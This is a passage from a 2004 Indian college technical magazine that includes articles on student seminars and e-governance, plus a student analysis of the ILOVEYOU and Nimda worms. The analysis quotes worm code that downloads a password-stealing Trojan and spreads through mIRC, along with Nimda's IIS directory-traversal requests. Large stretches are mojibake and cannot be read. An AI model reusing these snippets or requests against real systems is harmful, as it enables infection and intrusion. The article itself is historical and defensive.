aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 33: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

